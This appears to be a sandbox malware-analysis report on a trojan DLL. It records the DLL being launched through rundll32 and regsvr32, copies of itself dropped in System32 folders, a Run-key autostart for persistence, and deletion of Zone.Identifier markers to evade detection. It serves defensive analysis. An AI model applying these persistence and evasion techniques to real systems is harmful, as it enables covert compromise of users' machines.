Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000E368	4_2_000000018000E368
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E76C	4_2_000000018001E76C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180018778	4_2_0000000180018778
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180012780	4_2_0000000180012780
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001FB88	4_2_000000018001FB88
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180013B88	4_2_0000000180013B88
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022B8C	4_2_0000000180022B8C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000CB8D	4_2_000000018000CB8D
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180008FA0	4_2_0000000180008FA0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180014FA4	4_2_0000000180014FA4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800197AC	4_2_00000001800197AC
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800257B4	4_2_00000001800257B4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180013FE0	4_2_0000000180013FE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000F3E0	4_2_000000018000F3E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002735FD40000	4_2_000002735FD40000
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020454	5_2_0000000180020454
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028C94	5_2_0000000180028C94
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800038A5	5_2_00000001800038A5
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800248E0	5_2_00000001800248E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005DB4	5_2_0000000180005DB4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004DDC	5_2_0000000180004DDC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000B1E0	5_2_000000018000B1E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009E38	5_2_0000000180009E38
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180003BE8	5_2_0000000180003BE8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009BEC	5_2_0000000180009BEC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800173F8	5_2_00000001800173F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180017BF8	5_2_0000000180017BF8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015400	5_2_0000000180015400
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001000	5_2_0000000180001000
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000741C	5_2_000000018000741C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E828	5_2_000000018000E828
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002834	5_2_0000000180002834
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180014C48	5_2_0000000180014C48
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002005C	5_2_000000018002005C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180016464	5_2_0000000180016464
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005478	5_2_0000000180005478
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180006880	5_2_0000000180006880
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002748C	5_2_000000018002748C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001308C	5_2_000000018001308C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180024098	5_2_0000000180024098
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B898	5_2_000000018001B898
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000C498	5_2_000000018000C498
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004CA0	5_2_0000000180004CA0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800110AC	5_2_00000001800110AC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800148B0	5_2_00000001800148B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800078B6	5_2_00000001800078B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001CCC	5_2_0000000180001CCC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000B8D0	5_2_000000018000B8D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800198DC	5_2_00000001800198DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800038DC	5_2_00000001800038DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800264F8	5_2_00000001800264F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800084F8	5_2_00000001800084F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BD00	5_2_000000018000BD00
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015508	5_2_0000000180015508
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018D0C	5_2_0000000180018D0C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180012110	5_2_0000000180012110
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B520	5_2_000000018001B520
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180029124	5_2_0000000180029124
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180013524	5_2_0000000180013524
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009D24	5_2_0000000180009D24
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180023D28	5_2_0000000180023D28
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002128	5_2_0000000180002128
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020930	5_2_0000000180020930
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009144	5_2_0000000180009144
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001F550	5_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180020D54	5_2_0000000180020D54
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180010954	5_2_0000000180010954
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018560	5_2_0000000180018560
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E570	5_2_000000018000E570
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001C974	5_2_000000018001C974
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000F174	5_2_000000018000F174
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180025D84	5_2_0000000180025D84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005590	5_2_0000000180005590
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180017198	5_2_0000000180017198
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800159A0	5_2_00000001800159A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180011DAC	5_2_0000000180011DAC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000D1AC	5_2_000000018000D1AC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800069C0	5_2_00000001800069C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000A1D4	5_2_000000018000A1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800079D8	5_2_00000001800079D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001C1DC	5_2_000000018001C1DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000D1E0	5_2_000000018000D1E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800199E8	5_2_00000001800199E8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800099EC	5_2_00000001800099EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028A04	5_2_0000000180028A04
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001FA08	5_2_000000018001FA08
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E614	5_2_000000018001E614
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001A1C	5_2_0000000180001A1C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BA24	5_2_000000018000BA24
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180021A2C	5_2_0000000180021A2C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180019230	5_2_0000000180019230
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000BE34	5_2_000000018000BE34
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180012244	5_2_0000000180012244
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180006650	5_2_0000000180006650
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001660	5_2_0000000180001660
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180011664	5_2_0000000180011664
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001827C	5_2_000000018001827C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180024680	5_2_0000000180024680
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180022A84	5_2_0000000180022A84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000AE84	5_2_000000018000AE84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180028690	5_2_0000000180028690
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180015694	5_2_0000000180015694
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180007694	5_2_0000000180007694
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180013698	5_2_0000000180013698
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009298	5_2_0000000180009298
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002629C	5_2_000000018002629C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001629C	5_2_000000018001629C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000569C	5_2_000000018000569C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180027EA4	5_2_0000000180027EA4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800096B8	5_2_00000001800096B8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000EAC4	5_2_000000018000EAC4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180018ECC	5_2_0000000180018ECC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001B2F0	5_2_000000018001B2F0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180007AF0	5_2_0000000180007AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000E708	5_2_000000018000E708

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: U9M1w8FHBW.dll

Virustotal: Detection: 45%

Source: U9M1w8FHBW.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\U9M1w8FHBW.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\U9M1w8FHBW.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YKYTbOgY\pyluVjQOzYMsbAJk.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DahdrCXRHjoqlqPu\vvcfbAnuZpuTsj.dll"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AvyZUmIIeGJLvcye\aPdTkvBLdrznCXG.dll"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\OQOuTpy\WqdnfVdfYCxIlc.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\U9M1w8FHBW.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\U9M1w8FHBW.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DahdrCXRHjoqlqPu\vvcfbAnuZpuTsj.dll"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YKYTbOgY\pyluVjQOzYMsbAJk.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll"	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AvyZUmIIeGJLvcye\aPdTkvBLdrznCXG.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\OQOuTpy\WqdnfVdfYCxIlc.dll"	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Users\user\AppData\Local\OQOuTpy\

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@21/2@0/49

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFD14673CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,

0_2_00007FFD14673CB0

Source: C:\Windows\System32\loaddll64.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,

0_2_0000000180005DB4

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:120:WilError_01

Source: C:\Windows\System32\regsvr32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: U9M1w8FHBW.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: U9M1w8FHBW.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: U9M1w8FHBW.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: U9M1w8FHBW.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: U9M1w8FHBW.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: U9M1w8FHBW.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: U9M1w8FHBW.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: U9M1w8FHBW.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: U9M1w8FHBW.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14668909 push rdi; ret	0_2_00007FFD14668912
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466837D push rdi; ret	0_2_00007FFD14668384
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0D3 push 09B8E1F7h; retf	0_2_000000018001E0DD
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E0E9 push 8B48E1F7h; retf	0_2_000000018001E0F1
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023127 push ebp; ret	0_2_0000000180023128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E5C5 pushad ; ret	0_2_000000018001E5C7
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022E55 push ebp; retf	0_2_0000000180022E56
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023A7E push ebp; ret	0_2_0000000180023A86
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180022F5E push ebp; ret	0_2_0000000180022F64
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000838C push eax; ret	0_2_000000018000838E
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD14668909 push rdi; ret	3_2_00007FFD14668912
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD1466837D push rdi; ret	3_2_00007FFD14668384
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0D3 push 09B8E1F7h; retf	3_2_000000018001E0DD
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E0E9 push 8B48E1F7h; retf	3_2_000000018001E0F1
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023127 push ebp; ret	3_2_0000000180023128
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001E5C5 pushad ; ret	3_2_000000018001E5C7
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022E55 push ebp; retf	3_2_0000000180022E56
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180023A7E push ebp; ret	3_2_0000000180023A86
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180022F5E push ebp; ret	3_2_0000000180022F64
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000838C push eax; ret	3_2_000000018000838E
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E0D3 push 09B8E1F7h; retf	4_2_000000018001E0DD
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E0E9 push 8B48E1F7h; retf	4_2_000000018001E0F1
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180023127 push ebp; ret	4_2_0000000180023128
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001E5C5 pushad ; ret	4_2_000000018001E5C7
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022E55 push ebp; retf	4_2_0000000180022E56
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180023A7E push ebp; ret	4_2_0000000180023A86
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180022F5E push ebp; ret	4_2_0000000180022F64
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000838C push eax; ret	4_2_000000018000838E
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E0D3 push 09B8E1F7h; retf	5_2_000000018001E0DD
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001E0E9 push 8B48E1F7h; retf	5_2_000000018001E0F1
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180023127 push ebp; ret	5_2_0000000180023128

Source: U9M1w8FHBW.dll	Static PE information: section name: .gxfg
Source: U9M1w8FHBW.dll	Static PE information: section name: .gehcont

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\U9M1w8FHBW.dll

Source: C:\Windows\System32\rundll32.exe

PE file moved: C:\Windows\System32\DChihhZAEIop\NZICbhYKmnAVT.dll

Jump to behavior

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\regsvr32.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZICbhYKmnAVT.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZICbhYKmnAVT.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZICbhYKmnAVT.dll			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\loaddll64.exe	File opened: C:\Windows\system32\DahdrCXRHjoqlqPu\vvcfbAnuZpuTsj.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Windows\system32\YKYTbOgY\pyluVjQOzYMsbAJk.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\system32\AvyZUmIIeGJLvcye\aPdTkvBLdrznCXG.dll:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\OQOuTpy\WqdnfVdfYCxIlc.dll:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe TID: 4692

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.0 %

Source: C:\Windows\System32\loaddll64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466C334 FindFirstFileExW,		0_2_00007FFD1466C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD1466C334 FindFirstFileExW,		3_2_00007FFD1466C334

Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: regsvr32.exe, 00000006.00000003.495564956.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407564548.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768591524.000000000110C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: regsvr32.exe, 00000003.00000002.260237337.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: regsvr32.exe, 00000006.00000003.495564956.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407427813.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768387717.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407564548.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768591524.000000000110C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFD14669474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FFD14669474

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFD1466DD90 GetProcessHeap,

0_2_00007FFD1466DD90

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14669474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFD14669474
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14664944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFD14664944
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14663AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FFD14663AD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD14669474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFD14669474
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD14664944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFD14664944
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD14663AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FFD14663AD0

